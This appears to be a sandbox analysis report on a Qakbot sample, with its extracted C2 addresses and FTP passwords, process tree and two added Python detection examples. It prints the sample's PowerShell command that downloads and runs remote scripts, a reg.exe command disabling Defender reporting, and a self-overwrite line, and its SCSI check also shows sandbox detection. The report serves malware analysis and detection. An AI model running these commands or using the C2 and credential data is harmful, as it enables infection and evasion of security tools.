Analysis
max time kernel: 150s
max time network: 127s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-05-2024 21:10
Static task: static1
Behavioral task: behavioral1
  Sample: 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
  Resource: win10v2004-20240508-en
The signatures, process tree and dumps below are from behavioral2 (win10v2004-20240508-en), matching the platform and resource in the header.
General
Target: 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Size: 596KB
MD5: 310e65a59d3c670bc2bededf7ddef03e
SHA1: 77153c24512610f9ff8e00bf944a9fee8c8f2974
SHA256: 5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512: b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
SSDEEP: 6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT
Malware Config
Extracted (URLs pulled from the PowerShell command line; see the process tree):
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted (qakbot):
Family: qakbot
Version: 322.358
Botnet: mc06
Campaign: 1527585056
FTP credentials (protocol ftp; host:port, username, password). The username field reads "[email protected]" in the source for every entry, which is an obfuscation artifact of the page rather than the real value, so the usernames are unknown here:
37.60.244.211:21   [email protected]   4AsEzIaMwi2d
198.38.77.162:21   [email protected]   kJm6DKVPfyiv
61.221.12.26:21    [email protected]   346HZGCMlwecz9S
67.222.137.18:21   [email protected]   p4a8k6fE1FtA3pR
107.6.152.61:21    [email protected]   RoP4Af0RKAAQ74V
C2 (ip:port, one per line):
71.168.229.249:995
216.21.168.27:32101
216.218.74.196:443
46.177.55.119:443
66.222.48.40:443
93.108.180.227:443
47.40.29.239:443
184.180.157.203:2222
47.40.208.189:443
71.168.229.249:443
216.93.143.182:995
98.16.70.197:2222
75.127.141.50:995
96.248.15.254:995
74.87.248.174:2222
75.189.235.216:443
66.42.182.18:995
50.252.93.122:995
105.187.37.52:443
190.137.254.188:443
87.243.48.172:443
180.180.128.42:995
68.188.1.58:2078
67.83.122.112:2222
98.26.2.182:443
67.53.168.82:465
24.228.185.224:2222
75.110.87.185:443
68.46.145.243:443
74.88.210.56:995
173.81.42.136:443
68.207.36.211:443
185.219.83.73:443
47.223.85.190:443
190.185.219.110:443
24.100.46.201:2222
189.175.114.33:443
207.178.109.161:443
68.49.120.179:443
216.201.159.118:443
98.103.2.226:443
68.129.231.84:443
173.196.11.46:2222
70.94.109.57:443
66.189.228.49:995
98.242.248.219:443
72.215.129.5:443
71.190.202.120:443
67.42.92.9:443
67.238.217.83:443
47.157.103.78:2222
173.174.99.140:443
174.69.127.91:2083
68.133.47.150:443
24.175.99.25:443
184.90.44.223:443
144.163.12.226:443
68.113.142.24:465
71.1.31.71:443
75.135.8.120:443
65.173.74.217:2083
65.191.128.99:443
108.52.246.252:443
98.196.241.224:443
98.114.192.168:443
46.175.87.126:443
67.191.37.156:995
100.4.217.81:995
75.190.161.194:443
71.48.223.84:995
67.55.174.194:443
66.169.54.3:2222
68.206.133.7:443
73.227.31.181:995
73.40.24.158:443
24.6.31.163:443
173.209.20.200:443
97.70.85.248:443
50.80.129.234:443
65.169.66.123:2222
71.120.176.61:443
108.35.23.218:443
68.132.69.132:443
98.22.2.124:443
70.177.31.170:443
72.178.197.227:995
76.112.162.208:443
71.77.129.242:443
72.178.198.87:443
75.139.54.233:443
97.82.249.61:443
173.80.75.177:443
24.93.104.154:443
47.186.93.228:443
71.85.121.110:443
72.178.195.240:995
68.228.118.130:32100
71.85.72.9:443
208.104.163.142:443
68.74.206.211:465
68.228.32.150:443
98.243.166.148:443
47.221.46.163:443
68.207.48.140:443
72.183.161.77:443
104.33.252.147:443
47.134.180.77:443
99.197.182.183:443
75.106.233.194:443
76.101.165.66:443
70.118.18.242:443
70.169.12.141:443
77.122.224.184:995
173.160.3.209:443
73.18.9.164:443
73.58.60.60:443
70.21.182.149:2222
24.175.103.122:995
24.163.66.146:443
24.187.255.116:993
12.166.108.82:995
69.193.199.50:995
47.48.236.98:2222
24.45.182.71:2222
24.209.130.208:443
70.182.79.66:443
68.35.68.112:443
173.86.63.222:995
24.97.19.14:443
68.173.55.51:443
96.69.89.156:995
71.32.89.35:61200
63.79.135.0:443
69.145.82.204:443
76.16.122.156:443
66.68.188.203:443
76.169.73.234:443
174.195.142.124:443
72.178.203.107:443
107.15.153.110:443
24.42.164.2:22
50.198.141.161:2078
206.169.107.58:995
75.109.193.173:2222
173.248.25.11:443
96.73.55.193:993
75.109.193.173:1194
75.109.193.173:2087
Signatures

Blocklisted process makes network request (1 IoC)
  flow 21  pid 4176  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation  (310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe)

Executes dropped EXE (2 IoCs)
  pid 1268  aehup.exe
  pid 2008  aehup.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gtimv = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Aehupe\\aehup.exe\""  (explorer.exe)
  The value is written by the SysWOW64 explorer.exe instance (PID 3636) that aehup.exe started and wrote into, not by aehup.exe itself, so a detection keyed on the writing process alone sees explorer.exe.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Both the parent sample and the dropped aehup.exe open the same two device instances under \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI and query DeviceDesc and Service on each (six events per process):
  CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000  (key opened; DeviceDesc, Service queried)
  DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000  (key opened; DeviceDesc, Service queried)
  Processes: 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe, aehup.exe
  The disk instance reports vendor DADY while the DVD-ROM instance reports vendor QEMU, so a check for the QEMU string succeeds against the optical drive even though it would not against the disk.
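The check the signature describes can be reproduced. The following Python is an added example, not part of the report: it splits the two Enum\SCSI instance paths quoted above into kind, vendor and product, flags hypervisor vendor strings in those fields, and, on Windows, walks the same key and reads the same DeviceDesc and Service values the sample reads. The marker list and the function names are this example's own; the two paths are copied from the report.

```python
"""What the SCSI registry walk in the signature above actually sees. Added
example for this page: parse_scsi_instance, hypervisor_markers and the
marker list are this example's own; the two device paths are copied from
the report. enumerate_scsi_instances() reads the live registry and only
does anything on Windows."""
import re

# Vendor/product substrings that give a hypervisor away. Constructed list.
HYPERVISOR_MARKERS = ("qemu", "vmware", "vbox", "virtual", "xen", "bochs", "kvm")

# Copied from the report: the two instance keys both the sample and aehup.exe open.
REPORTED_INSTANCES = [
    r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000",
    r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000",
]

# <kind>&Ven_<vendor>&Prod_<product> is the Windows device-ID format under Enum\SCSI.
_ID_RE = re.compile(
    r"\\SCSI\\(?P<kind>[^&\\]+)&Ven_(?P<vendor>[^&\\]*)&Prod_(?P<product>[^&\\]*)", re.I
)


def parse_scsi_instance(key_path):
    """Split an Enum\\SCSI device-instance path into kind, vendor and product."""
    m = _ID_RE.search(key_path)
    if not m:
        raise ValueError(f"not an Enum\\SCSI device id: {key_path}")
    return {"kind": m["kind"], "vendor": m["vendor"], "product": m["product"]}


def hypervisor_markers(key_paths):
    """Map each instance path to the marker strings found in its vendor/product."""
    hits = {}
    for path in key_paths:
        dev = parse_scsi_instance(path)
        haystack = f"{dev['vendor']} {dev['product']}".lower()
        found = [mk for mk in HYPERVISOR_MARKERS if mk in haystack]
        if found:
            hits[path] = found
    return hits


def enumerate_scsi_instances():
    """Walk HKLM\\SYSTEM\\ControlSet001\\Enum\\SCSI like the sample does and read
    DeviceDesc and Service for each instance. Returns [] where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return []
    base = r"SYSTEM\ControlSet001\Enum\SCSI"
    out = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as scsi:
        for i in range(winreg.QueryInfoKey(scsi)[0]):
            dev_name = winreg.EnumKey(scsi, i)
            with winreg.OpenKey(scsi, dev_name) as dev:
                for j in range(winreg.QueryInfoKey(dev)[0]):
                    inst_name = winreg.EnumKey(dev, j)
                    path = "\\".join([r"\REGISTRY\MACHINE", base, dev_name, inst_name])
                    values = {}
                    with winreg.OpenKey(dev, inst_name) as inst:
                        for name in ("DeviceDesc", "Service"):
                            try:
                                values[name] = winreg.QueryValueEx(inst, name)[0]
                            except FileNotFoundError:
                                values[name] = None
                    out.append((path, values))
    return out


if __name__ == "__main__":
    live = enumerate_scsi_instances()
    paths = [p for p, _ in live] or REPORTED_INSTANCES
    for path, found in hypervisor_markers(paths).items():
        print(f"{path}\n  -> {found}")
```

Run against the two reported paths, only the CdRom instance is flagged (vendor QEMU); the Disk instance with vendor DADY passes, which is exactly the gap a sandbox operator closes by renaming every emulated device, optical drives included.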
Modifies registry class (4 IoCs)
  Keys created by RuntimeBroker.exe under \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable:
    PersistedStorageItemTable, ManagedByApp, MostRecentlyUsed, CurrentWorkingDirectory
  (Start-menu housekeeping by a system process; attributed to the sample only because the injected explorer.exe wrote into RuntimeBroker.exe.)

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (64 IoCs; PIDs listed once each)
  310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe: 1112, 5072
  aehup.exe: 1268, 2008
  powershell.exe: 4176
  explorer.exe (SysWOW64): 3636
  sihost.exe: 2828
  svchost.exe: 2968, 3572
  taskhostw.exe: 2976
  Explorer.EXE: 3432
  StartMenuExperienceHost.exe: 3844
  RuntimeBroker.exe: 3936, 3456, 4368, 4716, 3856
  TextInputHost.exe: 776
  msedge.exe: 3288, 3896, 3764, 4848

Suspicious behavior: MapViewOfSection (1 IoC)
  pid 1268  aehup.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  SeDebugPrivilege         4176  powershell.exe
  SeShutdownPrivilege      3432  Explorer.EXE
  SeCreatePagefilePrivilege  3432  Explorer.EXE
  SeShutdownPrivilege      3432  Explorer.EXE
  SeCreatePagefilePrivilege  3432  Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs; source -> target, number of events)
  1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -> 5072 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe (3)
  1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -> 1268 aehup.exe (3)
  1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -> 1856 reg.exe (2)
  1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -> 4176 powershell.exe (2)
  1268 aehup.exe -> 2008 aehup.exe (3)
  1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -> 768 cmd.exe (3)
  768 cmd.exe -> 552 PING.EXE (3)
  1268 aehup.exe -> 3636 explorer.exe (4)
  3636 explorer.exe -> 2828 sihost.exe (3)
  3636 explorer.exe -> 2968 svchost.exe (3)
  3636 explorer.exe -> 2976 taskhostw.exe (3)
  3636 explorer.exe -> 3432 Explorer.EXE (3)
  3636 explorer.exe -> 3572 svchost.exe (3)
  3636 explorer.exe -> 3748 DllHost.exe (3)
  3636 explorer.exe -> 3844 StartMenuExperienceHost.exe (3)
  3636 explorer.exe -> 3936 RuntimeBroker.exe (3)
  3636 explorer.exe -> 4020 SearchApp.exe (3)
  3636 explorer.exe -> 3456 RuntimeBroker.exe (3)
  3636 explorer.exe -> 4368 RuntimeBroker.exe (3)
  3636 explorer.exe -> 776 TextInputHost.exe (3)
  3636 explorer.exe -> 3288 msedge.exe (3)
  3636 explorer.exe -> 3896 msedge.exe (2; the listing stops after 64 entries)
  Writes from a parent into a child it has just created appear for every child in the tree, including the benign cmd.exe -> PING.EXE pair, so those are process-creation noise. The writes that matter are 1268 -> 3636 (aehup.exe into the explorer.exe it spawned) and the fan-out from 3636 into processes it did not create (sihost, svchost, taskhostw, Explorer.EXE, DllHost, StartMenuExperienceHost, RuntimeBroker, SearchApp, TextInputHost, msedge): that is the injection chain, and it is why those system processes carry the EnumeratesProcesses flag and the 176KB memory regions dumped below.
Processes (indented by parent/child depth as shown in the report; the top-level entries are the pre-existing session processes the injected explorer.exe later wrote into)

PID 2828  C:\Windows\system32\sihost.exe
  cmdline: sihost.exe
  - Suspicious behavior: EnumeratesProcesses

PID 2968  C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  - Suspicious behavior: EnumeratesProcesses

PID 2976  C:\Windows\system32\taskhostw.exe
  cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - Suspicious behavior: EnumeratesProcesses

PID 3432  C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

  PID 1112  C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    PID 5072  C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses

    PID 1268  C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
      cmdline: C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory

      PID 2008  C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
        cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe" /C
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses

      PID 3636  C:\Windows\SysWOW64\explorer.exe
        cmdline: C:\Windows\SysWOW64\explorer.exe
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        (32-bit explorer.exe started and written into by aehup.exe; this instance sets the Run key and then writes into the top-level session processes in this tree)

    PID 1856  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
      (sets SpyNetReporting to 0 to switch off Defender cloud/MAPS reporting; the write targets HKLM, and the report shows no registry event for it, so whether it succeeded is not visible here)

    PID 4176  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\mharlqxsphmtnmrgcqbpshzjhd.txt'"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      (download cradle: two scripts are fetched from Dropbox and run in memory with IEX, then Invoke-MainWorker, which those scripts must define, is called with a dropped .txt file as its argument; nothing touches disk as a .ps1 except the policy-test file listed under Downloads)

    PID 768  C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
      - Suspicious use of WriteProcessMemory
      (six pings to loopback as a delay of roughly five seconds, then the dropper's own file in %TEMP% is overwritten with the contents of calc.exe, so what is left on disk under the sample's name no longer matches the hashes above)

      PID 552  C:\Windows\SysWOW64\PING.EXE
        cmdline: ping.exe -n 6 127.0.0.1
        - Runs ping.exe

PID 3572  C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  - Suspicious behavior: EnumeratesProcesses

PID 3748  C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

PID 3844  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious behavior: EnumeratesProcesses

PID 3936  C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses

PID 4020  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

PID 3456  C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious behavior: EnumeratesProcesses

PID 4368  C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious behavior: EnumeratesProcesses

PID 776  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
  cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
  - Suspicious behavior: EnumeratesProcesses

PID 3288  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  - Suspicious behavior: EnumeratesProcesses
  (background Edge start-up, not launched by the sample; it appears here because explorer.exe PID 3636 wrote into PIDs 3288 and 3896)

  PID 3896  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbfd89ceb8,0x7ffbfd89cec4,0x7ffbfd89ced0
    - Suspicious behavior: EnumeratesProcesses

  PID 3764  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses

  PID 4848  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses

  PID 3632  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2404,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:8

  PID 1572  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8

PID 4896  C:\Windows\system32\backgroundTaskHost.exe
  cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca

PID 4716  C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious behavior: EnumeratesProcesses

PID 3856  C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious behavior: EnumeratesProcesses
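As an added example, not part of the report, the following Python runs a few behavioural rules over process-creation events built from the command lines in the tree above: the PowerShell download cradle, the reg.exe write that zeroes SpyNetReporting, the cmd.exe line that overwrites its parent's own executable after a ping delay, and explorer.exe being started by a binary under AppData. The EVENTS list is constructed here from those command lines, with parent PIDs taken from the tree's nesting (None for top-level entries); the rule names, the Hit type and the ATT&CK labels are this example's own choices.

```python
"""Behavioural rules over process-creation events taken from the tree above.
Added example for this page; EVENTS is constructed from the report's command
lines, and the rule names, Hit type and technique labels are this example's own."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    pid: int
    rule: str
    technique: str


# Constructed from the process tree above. ppid=None for top-level entries.
EVENTS = [
    {"pid": 3432, "ppid": None, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 1112, "ppid": 3432,
     "image": r"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"'},
    {"pid": 1268, "ppid": 1112,
     "image": r"C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe",
     "cmdline": r"C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe"},
    {"pid": 3636, "ppid": 1268, "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 1856, "ppid": 1112, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"'},
    {"pid": 4176, "ppid": 1112,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\mharlqxsphmtnmrgcqbpshzjhd.txt'"'''},
    {"pid": 768, "ppid": 1112, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"'},
    {"pid": 2828, "ppid": None, "image": r"C:\Windows\system32\sihost.exe",
     "cmdline": "sihost.exe"},  # benign control: must not fire
]


def _image_is(ev, name):
    return ev["image"].lower().endswith("\\" + name)


def powershell_download_cradle(ev, _by_pid):
    """IEX plus DownloadString in one command line: remote script run in memory."""
    c = ev["cmdline"].lower()
    return _image_is(ev, "powershell.exe") and "downloadstring(" in c \
        and ("iex" in c or "invoke-expression" in c)


def defender_spynet_reporting_disabled(ev, _by_pid):
    """reg.exe zeroing SpyNetReporting turns off Defender cloud (MAPS) reporting."""
    c = ev["cmdline"].lower()
    return _image_is(ev, "reg.exe") and "spynetreporting" in c \
        and re.search(r'/d\s+"?0"?(\s|$)', c) is not None


def cmd_overwrites_parent_image(ev, by_pid):
    """cmd.exe stalls on a loopback ping, then redirects a file over the
    executable of its own parent: the dropper wiping itself from disk."""
    if not _image_is(ev, "cmd.exe") or "127.0.0.1" not in ev["cmdline"]:
        return False
    m = re.search(r'type\s+"[^"]+"\s*>\s*"([^"]+)"', ev["cmdline"], re.I)
    parent = by_pid.get(ev["ppid"])
    return bool(m and parent and parent["image"].lower() == m.group(1).lower())


def explorer_spawned_from_appdata(ev, by_pid):
    """explorer.exe normally starts under userinit.exe at logon; a copy started
    by a binary under AppData is an injection target being staged."""
    parent = by_pid.get(ev["ppid"])
    return _image_is(ev, "explorer.exe") and parent is not None \
        and "\\appdata\\" in parent["image"].lower()


RULES = {
    "powershell_download_cradle": (powershell_download_cradle, "T1059.001 / T1105"),
    "defender_spynet_reporting_disabled": (defender_spynet_reporting_disabled, "T1562.001"),
    "cmd_overwrites_parent_image": (cmd_overwrites_parent_image, "T1070.004"),
    "explorer_spawned_from_appdata": (explorer_spawned_from_appdata, "T1055"),
}


def run_rules(events):
    """Evaluate every rule against every event; return Hits in event order."""
    by_pid = {ev["pid"]: ev for ev in events}
    return [Hit(ev["pid"], name, tech)
            for ev in events
            for name, (fn, tech) in RULES.items()
            if fn(ev, by_pid)]


if __name__ == "__main__":
    for h in run_rules(EVENTS):
        print(f"PID {h.pid:<5} {h.rule:<36} {h.technique}")
```

The self-overwrite rule deliberately requires the redirect target to equal the parent's image path rather than matching on "ping" plus "type" alone; the same ping-as-sleep idiom shows up in installers, so the parent-image comparison is what keeps the rule quiet on those.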
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 47KB
  MD5: 11b47e74dc0dcb35df32bd7eda4bafa9
  SHA1: f7712ef8034bf5ebe191a0d1fa0ff2d2c56018fd
  SHA256: ef1666a43273ec68e4a04c2274e03a45e2365d4ccae40b70d11542054860f8cd
  SHA512: 91b0ffe75a66c12402f7f280bb6fc10456301136263f0d7a36d3544e0746b843dc809b4bea74fdd350475dc76e447b6c56202ce534c3aecbc0698f3652691154
  (Edge profile state written by the browser's own background start-up, not by the sample)

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shvbiyq.ghu.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  (written by powershell.exe at start-up to test AppLocker/WDAC script policy; it is not the downloaded payload, which never touches disk as a .ps1)

C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehu.dat
  Filesize: 92B
  MD5: 6bc7e90319080872ea7ba9b18d821155
  SHA1: cbe2b2ce9a1267986a672207f7bbdfe067689bc5
  SHA256: 27eee1a25a4e6ec5f10e408550df291f846ca63ac51ba3d66a5fd0846d8481e6
  SHA512: c879842629acdd57bce3a0175e360dd36391f693e057c38e960dea8d7abc345c4f221a27a3070a63ffb1c1010bbd00a780b91afb7595a51e883862f7c77fe6df

